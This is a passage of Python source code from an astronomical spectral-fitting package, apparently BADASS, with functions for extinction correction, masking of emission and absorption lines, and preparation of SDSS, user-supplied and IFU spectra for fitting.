def ccm_unred(wave, flux, ebv, r_v=""):
"""ccm_unred(wave, flux, ebv, r_v="")
Deredden a flux vector using the CCM 1989 parameterization
Returns an array of the unreddened flux
INPUTS:
wave - array of wavelengths (in Angstroms)
dec - calibrated flux array, same number of elements as wave
ebv - colour excess E(B-V) float. If a negative ebv is supplied
fluxes will be reddened rather than dereddened
OPTIONAL INPUT:
r_v - float specifying the ratio of total selective
extinction R(V) = A(V)/E(B-V). If not specified,
then r_v = 3.1
OUTPUTS:
funred - unreddened calibrated flux array, same number of
elements as wave
NOTES:
1. This function was converted from the IDL Astrolib procedure
last updated in April 1998. All notes from that function
(provided below) are relevant to this function
2. (From IDL:) The CCM curve shows good agreement with the Savage & Mathis (1979)
ultraviolet curve shortward of 1400 A, but is probably
preferable between 1200 and 1400 A.
3. (From IDL:) Many sightlines with peculiar ultraviolet interstellar extinction
can be represented with a CCM curve, if the proper value of
R(V) is supplied.
4. (From IDL:) Curve is extrapolated between 912 and 1000 A as suggested by
Longo et al. (1989, ApJ, 339,474)
5. (From IDL:) Use the 4 parameter calling sequence if you wish to save the
original flux vector.
6. (From IDL:) Valencic et al. (2004, ApJ, 616, 912) revise the ultraviolet CCM
curve (3.3 -- 8.0 um-1). But since their revised curve does
not connect smoothly with longer and shorter wavelengths, it is
not included here.
7. For the optical/NIR transformation, the coefficients from
O'Donnell (1994) are used
>>> ccm_unred([1000, 2000, 3000], [1, 1, 1], 2 )
array([9.7976e+012, 1.12064e+07, 32287.1])
"""
wave = np.array(wave, float)
flux = np.array(flux, float)
if wave.size != flux.size: raise TypeError( 'ERROR - wave and flux vectors must be the same size')
if not bool(r_v): r_v = 3.1
x = 10000.0/wave
# Correction invalid for x>11:
if np.any(x>11):
return flux
npts = wave.size
a = np.zeros(npts, float)
b = np.zeros(npts, float)
###############################
#Infrared
good = np.where( (x > 0.3) & (x < 1.1) )
a[good] = 0.574 * x[good]**(1.61)
b[good] = -0.527 * x[good]**(1.61)
###############################
# Optical & Near IR
good = np.where( (x >= 1.1) & (x < 3.3) )
y = x[good] - 1.82
c1 = np.array([ 1.0 , 0.104, -0.609, 0.701, 1.137, \
-1.718, -0.827, 1.647, -0.505 ])
c2 = np.array([ 0.0, 1.952, 2.908, -3.989, -7.985, \
11.102, 5.491, -10.805, 3.347 ] )
a[good] = np.polyval(c1[::-1], y)
b[good] = np.polyval(c2[::-1], y)
###############################
# Mid-UV
good = np.where( (x >= 3.3) & (x < 8) )
y = x[good]
F_a = np.zeros(np.size(good),float)
F_b = np.zeros(np.size(good),float)
good1 = np.where( y > 5.9 )
if np.size(good1) > 0:
y1 = y[good1] - 5.9
F_a[ good1] = -0.04473 * y1**2 - 0.009779 * y1**3
F_b[ good1] = 0.2130 * y1**2 + 0.1207 * y1**3
a[good] = 1.752 - 0.316*y - (0.104 / ( (y-4.67)**2 + 0.341 )) + F_a
b[good] = -3.090 + 1.825*y + (1.206 / ( (y-4.62)**2 + 0.263 )) + F_b
###############################
# Far-UV
good = np.where( (x >= 8) & (x <= 11) )
y = x[good] - 8.0
c1 = [ -1.073, -0.628, 0.137, -0.070 ]
c2 = [ 13.670, 4.257, -0.420, 0.374 ]
a[good] = np.polyval(c1[::-1], y)
b[good] = np.polyval(c2[::-1], y)
# Applying Extinction Correction
a_v = r_v * ebv
a_lambda = a_v * (a + b/r_v)
funred = flux * 10.0**(0.4*a_lambda)
return funred #,a_lambda
##################################################################################
def nan_helper(y):
"""
Helper to handle indices and logical indices of NaNs.
Input:
- y, 1d numpy array with possible NaNs
Output:
- nans, logical indices of NaNs
- index, a function, with signature indices= index(logical_indices),
to convert logical indices of NaNs to 'equivalent' indices
Example:
>>> # linear interpolation of NaNs
>>> nans, x= nan_helper(y)
>>> y[nans]= np.interp(x(nans), x(~nans), y[~nans])
"""
return np.isnan(y), lambda z: z.nonzero()[0]
def insert_nan(spec,ibad):
"""
Inserts additional NaN values to neighboriing ibad pixels.
"""
all_bad = np.unique(np.concatenate([ibad-1,ibad,ibad+1]))
ibad_new = []
for i in all_bad:
if (i>0) & (i<len(spec)):
ibad_new.append(i)
ibad_new = np.array(ibad_new)
try:
spec[ibad_new] = np.nan
return spec
except:
return spec
def emline_masker(wave,spec,noise):
"""
Runs a multiple moving window median
to determine location of emission lines
to generate an emission line mask for
continuum fitting.
"""
# Do a series of median filters with window sizes up to 20
window_sizes = [2,5,10,50,100,250,500]#np.arange(10,510,10,dtype=int)
med_spec = np.empty((len(wave),len(window_sizes)))
#
for i in range(len(window_sizes)):
med_spec[:,i] = window_filter(spec,window_sizes[i])
#
mask_bad = np.unique(np.where((np.std(med_spec,axis=1)>noise) | (np.std(med_spec,axis=1)>np.nanmedian(noise)))[0])
# mask_good = np.unique(np.where((np.std(med_spec,axis=1)<noise) & (np.std(med_spec,axis=1)<np.nanmedian(noise)))[0])
#
return mask_bad#,mask_good
def metal_masker(wave,spec,noise,fits_file):
"""
Runs a neural network using BIFROST
to determine location of emission lines
to generate an emission line mask for
continuum fitting.
"""
# Initialize the neural network
line_name = ['metal_abs', 'generic_line']
neuralnet = bifrost.NeuralNet()
# Set up file paths
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'badass_data_files', 'neural_network')
if not os.path.exists(path):
os.mkdir(path)
_file = os.path.join(path, "metal.absorption.network.h5")
_plot = os.path.join(os.path.abspath(os.path.dirname(fits_file)), "metal.nn.convolve.html")
# If not already trained, it must be trained
if not os.path.exists(_file):
print("Training neural network to mask metal absorption...")
neuralnet.train(line_name, target_line=0, size=100_000, epochs=11, save_path=_file)
# Otherwise, just load in the already-trained neural network
else:
neuralnet.load(_file, line_name, target_line=0)
# Convert arrays to the native byte order
l_wave = wave if wave.dtype.byteorder == '=' else wave.byteswap().newbyteorder('=')
l_spec = spec if spec.dtype.byteorder == '=' else spec.byteswap().newbyteorder('=')
l_noise = noise if noise.dtype.byteorder == '=' else noise.byteswap().newbyteorder('=')
# (the noise isn't actually used)
# Smooth and subtract spectrum to leave only narrow features
l_spec = (l_spec - gaussian_filter1d(l_spec, 20)) / np.nanmedian(l_spec)
l_noise = l_noise / np.nanmedian(l_spec)
# Now the fun part, do a "convolution" (not really) of the neural network with a 100-angstrom wide window
# to get the confidence that a metal absorption line exists at each wavelength
cwave, conf = neuralnet.convolve(l_wave, l_spec, l_noise, out_path=_plot)
# Additional challenge -- re-mapping cwave back onto the original wave array
remap = np.array([np.abs(wave - cwi).argmin() for cwi in cwave])
# Mask all pixels where the confidence is over 50%
mask_bad = remap[conf > 0.5]
return mask_bad
def window_filter(spec,size):
"""
Estimates the median value of the spectrum
within a pixel window.
"""
med_spec = np.empty(len(spec))
pix = np.arange(0,len(spec),1)
for i,p in enumerate(pix):
# Get n-nearest pixels
# Calculate distance from i to each pixel
i_sort =np.argsort(np.abs(i-pix))
idx = pix[i_sort][:size] # indices we estimate from
med = np.median(spec[idx])
med_spec[i] = med
#
return med_spec
def interpolate_metal(spec,noise):
"""
Interpolates over metal absorption lines for
high-redshift spectra using a moving median
filter.
"""
sig_clip = 3.0
nclip = 10
bandwidth= 15
med_spec = window_filter(spec,bandwidth)
count = 0
new_spec = np.copy(spec)
while (count<=nclip) and ((np.std(new_spec-med_spec)*sig_clip)>np.median(noise)):
count+=1
# Get locations of nan or -inf pixels
nan_spec = np.where((np.abs(new_spec-med_spec)>(np.std(new_spec-med_spec)*sig_clip)) & (new_spec < (med_spec-sig_clip*noise)) )[0]
if len(nan_spec)>0:
inan = np.unique(np.concatenate([nan_spec]))
buffer = 0
inan_buffer_upp = np.array([(i+buffer) for i in inan if (i+buffer) < len(spec)],dtype=int)
inan_buffer_low = np.array([(i-buffer) for i in inan if (i-buffer) > 0],dtype=int)
inan = np.concatenate([inan,inan_buffer_low, inan_buffer_upp])
# Interpolate over nans and infs if in spec
new_spec[inan] = np.nan
new_spec = insert_nan(new_spec,inan)
nans, x= nan_helper(new_spec)
new_spec[nans]= np.interp(x(nans), x(~nans), new_spec[~nans])
else:
break
#
return new_spec
##################################################################################
#### Prepare SDSS spectrum #######################################################
def prepare_sdss_spec(fits_file,fit_reg,mask_bad_pix,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=False):
"""
Adapted from example from Cappellari's pPXF (Cappellari et al. 2004,2017)
Prepare an SDSS spectrum for pPXF, returning all necessary
parameters.
"""
# Load the data
hdu = fits.open(fits_file)
header_cols = [i.keyword for i in hdu[0].header.cards]
# Retrieve redshift from spectrum file (specobj table)
specobj = hdu[2].data
z = specobj['z'][0]
# For featureless objects, we force z = 0
# fit_reg = (0,20000)
# Retrieve RA and DEC from spectrum file
# if RA and DEC not present, assume an average Galactic E(B-V)
if ("RA" in header_cols) and ("DEC" in header_cols):
ra = hdu[0].header['RA']
dec = hdu[0].header['DEC']
ebv_corr = True
else:
ebv_corr = False
# t = hdu['COADD'].data
t = hdu[1].data
hdu.close()
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channnels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx!=0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx == len(lam)):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ( ( ((10**t['loglam'])/(1+z)) >= low_val) & ( ((10**t['loglam'])/(1+z)) <= upp_val) )
return mask
mask = generate_mask(fit_min, fit_max, (10**t['loglam'])/(1+z) )
# Unpack the spectra
galaxy = t['flux'][mask]
# SDSS spectra are already log10-rebinned
loglam_gal = t['loglam'][mask] # This is the observed SDSS wavelength range, NOT the rest wavelength range of the galaxy
lam_gal = 10**loglam_gal
ivar = t['ivar'][mask] # inverse variance
noise = np.sqrt(1.0/ivar) # 1-sigma spectral noise
and_mask = t['and_mask'][mask] # bad pixels
bad_pix = np.where(and_mask!=0)[0]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(~np.isfinite(galaxy))[0]
nan_noise = np.where(~np.isfinite(noise))[0]
inan = np.unique(np.concatenate([nan_gal,nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_bad_pix:
for b in bad_pix:
fit_mask_bad.append(b)
if mask_emline:
emline_mask_bad = emline_masker(lam_gal,galaxy,noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask)>0:
for i in user_mask:
ibad = np.where((lam_gal/(1.0+z)>=i[0]) & (lam_gal/(1.0+z)<=i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal,galaxy,noise,fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0,len(lam_gal),1,dtype=int),fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1]/lam_gal[0] # Constant lambda fraction per pixel
dlam_gal = (frac - 1)*lam_gal # Size of every pixel in Angstrom
# print('\n Size of every pixel: %s (A)' % dlam_gal)
wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
fwhm_gal = 2.355*wdisp*dlam_gal # Resolution FWHM of every pixel, in angstroms
velscale = np.log(frac)*c # Constant velocity scale in km/s per pixel
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (See Sec2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a red shift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following three commented lines:
#
lam_gal = lam_gal/(1.0+z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal/(1.0+z) # Adjust resolution in Angstrom
# fwhm_gal = np.full_like(lam_gal,0.0)
# We pass this interp1d class to the fit_model function to correct for
# the instrumental resolution of emission lines in our model
# fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
val,idx = find_nearest(lam_gal,5175)
################################################################################
#################### Correct for galactic extinction ##################
if ebv_corr==True:
co = coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')
try:
table = IrsaDust.get_query_table(co,section='ebv')
ebv = table['ext SandF mean'][0]
except:
ebv = 0.04 # average Galactic E(B-V)
# If E(B-V) is large, it can significantly affect normalization of the
# spectrum, in addition to changing its shape. Re-normalizing the spectrum
# throws off the maximum likelihood fitting, so instead of re-normalizing,
# we set an upper limit on the allowed ebv value for Galactic de-reddening.
if (ebv>=1.0):
ebv = 0.04 # average Galactic E(B-V)
elif ebv_corr==False:
ebv = 0.04 # average Galactic E(B-V)
galaxy = ccm_unred(lam_gal,galaxy,ebv)
#######################################################################
# Write to log
write_log((fits_file,ra,dec,z,cosmology,fit_min,fit_max,velscale,ebv),'prepare_sdss_spec',run_dir)
################################################################################
if plot:
prepare_sdss_plot(lam_gal,galaxy,noise,fit_mask_bad,run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' SDSS redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region:' , '(%d,%d) [A]' % (fit_reg[0],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale:' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good
##################################################################################
def prepare_sdss_plot(lam_gal,galaxy,noise,ibad,run_dir):
# Plot the galaxy fitting region
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(1,1,1)
ax1.step(lam_gal,galaxy,label='Object Fit Region',linewidth=0.5, color='xkcd:bright aqua')
ax1.step(lam_gal,noise,label='$1\sigma$ Uncertainty',linewidth=0.5,color='xkcd:bright orange')
ax1.axhline(0.0,color='white',linewidth=0.5,linestyle='--')
# Plot bad pixels
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
fontsize = 14
ax1.set_title(r'Fitting Region',fontsize=fontsize)
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)',fontsize=fontsize)
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=fontsize)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax1.legend(loc='best')
plt.tight_layout()
plt.savefig(run_dir.joinpath('fitting_region.pdf'))
ax1.clear()
fig.clear()
plt.close(fig)
#
return
##################################################################################
#### Prepare User Spectrum #######################################################
def prepare_user_spec(fits_file,spec,wave,err,fwhm,z,ebv,fit_reg,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=True):
"""
Prepares user-input spectrum for BADASS fitting.
"""
# Normalize the spectrum by the same factor as SDSS
spec = spec/1.e-17
err = err/1.e-17
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channnels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx!=0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx == len(lam)):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ( lam >= low_val) & ( lam <= upp_val)
return mask
# First, we must log-rebin the linearly-binned input spectrum
# If the spectrum is NOT linearly binned, we need to do that before we
# try to log-rebin:
if not np.isclose(wave[1]-wave[0],wave[-1]-wave[-2]):
if verbose:
print("\n Input spectrum is not linearly binned. BADASS will linearly rebin and conserve flux...")
new_wave = np.linspace(wave[0],wave[-1],len(wave))
spec, err = spectres.spectres(new_wavs=new_wave, spec_wavs=wave, spec_fluxes=spec,
spec_errs=err, fill=None, verbose=False)
# Fill in any NaN
mask = np.isnan(spec)
spec[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), spec[~mask])
mask = np.isnan(err)
err[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), err[~mask])
#
wave = new_wave
lamRange = (np.min(wave),np.max(wave))
galaxy, logLam, velscale = log_rebin(lamRange, spec, velscale=None, flux=True)
noise, _, _ = log_rebin(lamRange, err, velscale=velscale, flux=True)
lam_gal = np.exp(logLam)
mask = generate_mask(fit_min, fit_max, lam_gal/(1+z) )
if len(noise)<len(galaxy):
diff = len(galaxy)-len(noise)
noise = np.append(noise,np.full_like(np.nanmedian(noise),diff))
galaxy = galaxy[mask]
lam_gal = lam_gal[mask]
noise = noise[mask]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(~np.isfinite(galaxy))[0]
nan_noise = np.where(~np.isfinite(noise))[0]
inan = np.unique(np.concatenate([nan_gal,nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_emline:
emline_mask_bad = emline_masker(lam_gal,galaxy,noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask)>0:
for i in user_mask:
ibad = np.where((lam_gal/(1.0+z)>=i[0]) & (lam_gal/(1.0+z)<=i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal,galaxy,noise,fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
# Mask pixels exactly equal to zero (but not negative pixels)
mask_zeros = True
edge_mask_pix = 5
zero_pix = np.where(galaxy==0)[0]
if mask_zeros:
for i in zero_pix:
m = np.arange(i-edge_mask_pix,i+edge_mask_pix,1)
for b in m:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0,len(lam_gal),1,dtype=int),fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1]/lam_gal[0] # Constant lambda fraction per pixel
# print(frac)
dlam_gal = (frac - 1)*lam_gal # Size of every pixel in Angstrom
# print(dlam_gal)
# # print('\n Size of every pixel: %s (A)' % dlam_gal)
# print(fwhm/dlam_gal) # FWHM of every pixel in pixels
# wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
# fwhm_gal = 2.355*wdisp*dlam_gal # Resolution FWHM of every pixel, in angstroms
# velscale = np.log(frac)*c # Constant velocity scale in km/s per pixel
if type(fwhm) in (list, np.ndarray):
fwhm_gal = fwhm[mask]
else:
fwhm_gal = np.full(lam_gal.shape, fill_value=fwhm)
velscale = velscale[0]
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (See Sec2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a red shift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following three commented lines:
#
lam_gal = lam_gal/(1+z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal/(1+z) # Adjust resolution in Angstrom
#################### Correct for galactic extinction ##################
galaxy = ccm_unred(lam_gal,galaxy,ebv)
#######################################################################
# Write to log
write_log((fits_file,z,cosmology,fit_min,fit_max,velscale,ebv),'prepare_user_spec',run_dir)
################################################################################
if plot:
prepare_user_plot(lam_gal,galaxy,noise,fit_mask_bad,run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region:' , '(%d,%d) [A]' % (fit_reg[0],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale:' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
#
# fit_mask_good = np.arange(0,len(lam_gal),1,dtype=int)
#
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good
##################################################################################
def prepare_user_plot(lam_gal,galaxy,noise,ibad,run_dir):
# Plot the galaxy fitting region
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(1,1,1)
ax1.step(lam_gal,galaxy,label='Object Fit Region',linewidth=0.5, color='xkcd:bright aqua')
ax1.step(lam_gal,noise,label='$1\sigma$ Uncertainty',linewidth=0.5,color='xkcd:bright orange')
ax1.axhline(0.0,color='white',linewidth=0.5,linestyle='--')
# Plot bad pixels
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
fontsize = 14
ax1.set_title(r'Fitting Region',fontsize=fontsize)
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)',fontsize=fontsize)
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=fontsize)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax1.legend(loc='best')
plt.tight_layout()
plt.savefig(run_dir.joinpath('fitting_region.pdf'))
ax1.clear()
fig.clear()
plt.close(fig)
#
return
##################################################################################
def prepare_ifu_spec(fits_file,fit_reg,mask_bad_pix,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=False):
"""
Adapted from example from Cappellari's pPXF (Cappellari et al. 2004,2017)
Prepare an SDSS spectrum for pPXF, returning all necessary
parameters.
"""
# Load the data
hdu = fits.open(fits_file)
format = hdu[0].header['FORMAT']
specobj = hdu[2].data
z = specobj['z'][0]
try:
ra = hdu[0].header['RA']
dec = hdu[0].header['DEC']
except:
ra = specobj['PLUG_RA'][0]
dec = specobj['PLUG_DEC'][0]
binnum = hdu[0].header['BINNUM']
spaxelx = hdu[3].data['spaxelx']
spaxely = hdu[3].data['spaxely']
# t = hdu['COADD'].data
t = hdu[1].data
hdu.close()
co = coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')
try:
table = IrsaDust.get_query_table(co, section='ebv')
ebv = table['ext SandF mean'][0]
except:
ebv = 0.04 # average Galactic E(B-V)
# If E(B-V) is large, it can significantly affect normalization of the
# spectrum, in addition to changing its shape. Re-normalizing the spectrum
# throws off the maximum likelihood fitting, so instead of re-normalizing,
# we set an upper limit on the allowed ebv value for Galactic de-reddening.
if (ebv >= 1.0):
ebv = 0.04 # average Galactic E(B-V)
if format != 'MANGA':
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good = prepare_user_spec(fits_file,t['flux']*1e-17,10**t['loglam'],np.sqrt(1.0/t['ivar'])*1e-17,t['fwhm_res'],z,ebv,fit_reg,
mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=verbose,plot=plot)
return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good,binnum,spaxelx,spaxely
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min, fit_max = float(fit_reg[0]), float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channnels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx != 0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx == len(lam)):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ((((10 ** t['loglam']) / (1 + z)) >= low_val) & (((10 ** t['loglam']) / (1 + z)) <= upp_val))
return mask
mask = generate_mask(fit_min, fit_max, (10 ** t['loglam']) / (1 + z))
# Unpack the spectra
galaxy = t['flux'][mask]
# SDSS spectra are already log10-rebinned
loglam_gal = t['loglam'][mask] # This is the observed SDSS wavelength range, NOT the rest wavelength range of the galaxy
lam_gal = 10 ** loglam_gal
ivar = t['ivar'][mask] # inverse variance
noise = np.sqrt(1.0/ivar) # 1-sigma spectral noise
and_mask = t['and_mask'][mask] # bad pixels
bad_pix = np.where(and_mask != 0)[0]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(galaxy / galaxy != 1)[0]
nan_noise = np.where(noise / noise != 1)[0]
inan = np.unique(np.concatenate([nan_gal, nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_bad_pix:
for b in bad_pix:
fit_mask_bad.append(b)
if mask_emline:
emline_mask_bad = emline_masker(lam_gal, galaxy, noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask) > 0:
for i in user_mask:
ibad = np.where((lam_gal / (1.0 + z) >= i[0]) & (lam_gal / (1.0 + z) <= i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal, galaxy, noise, fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0, len(lam_gal), 1, dtype=int), fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1] / lam_gal[0] # Constant lambda fraction per pixel
# dlam_gal = (frac - 1) * lam_gal # Size of every pixel in Angstrom
# print('\n Size of every pixel: %s (A)' % dlam_gal)
# wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
# fwhm_gal = 2.355 * wdisp * dlam_gal # Resolution FWHM of every pixel, in angstroms
fwhm_gal = t['fwhm_res'][mask]
velscale = np.log(frac) * c # Constant velocity scale in km/s per pixel
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (See Sec2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a red shift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following three commented lines:
#
lam_gal = lam_gal / (1.0 + z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal / (1.0 + z) # Adjust resolution in Angstrom
# fwhm_gal = np.full_like(lam_gal,0.0)
# We pass this interp1d class to the fit_model function to correct for
# the instrumental resolution of emission lines in our model
# fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
val, idx = find_nearest(lam_gal, 5175)
################################################################################
#################### Correct for galactic extinction ##################
galaxy = ccm_unred(lam_gal, galaxy, ebv)
#######################################################################
# Write to log
write_log((fits_file, ra, dec, z, cosmology, fit_min, fit_max, velscale, ebv), 'prepare_sdss_spec', run_dir)
################################################################################
if plot:
prepare_sdss_plot(lam_gal, galaxy, noise, fit_mask_bad, run_dir)
if verbose:
print('\n')
print('-----------------------------------------------------------')
print('{0:<30}{1:<30}'.format(' file:' , fits_file.name ))
print('{0:<30}{1:<30}'.format(' SDSS redshift:' , '%0.5f' % z ))
print('{0:<30}{1:<30}'.format(' fitting region' , '(%d,%d) [A]' % (fit_reg[0 ],fit_reg[1]) ))
print('{0:<30}{1:<30}'.format(' velocity scale' , '%0.2f [km/s/pixel]' % velscale ))
print('{0:<30}{1:<30}'.format(' Galactic E(B-V):', '%0.3f' % ebv ))
print('-----------------------------------------------------------')
################################################################################
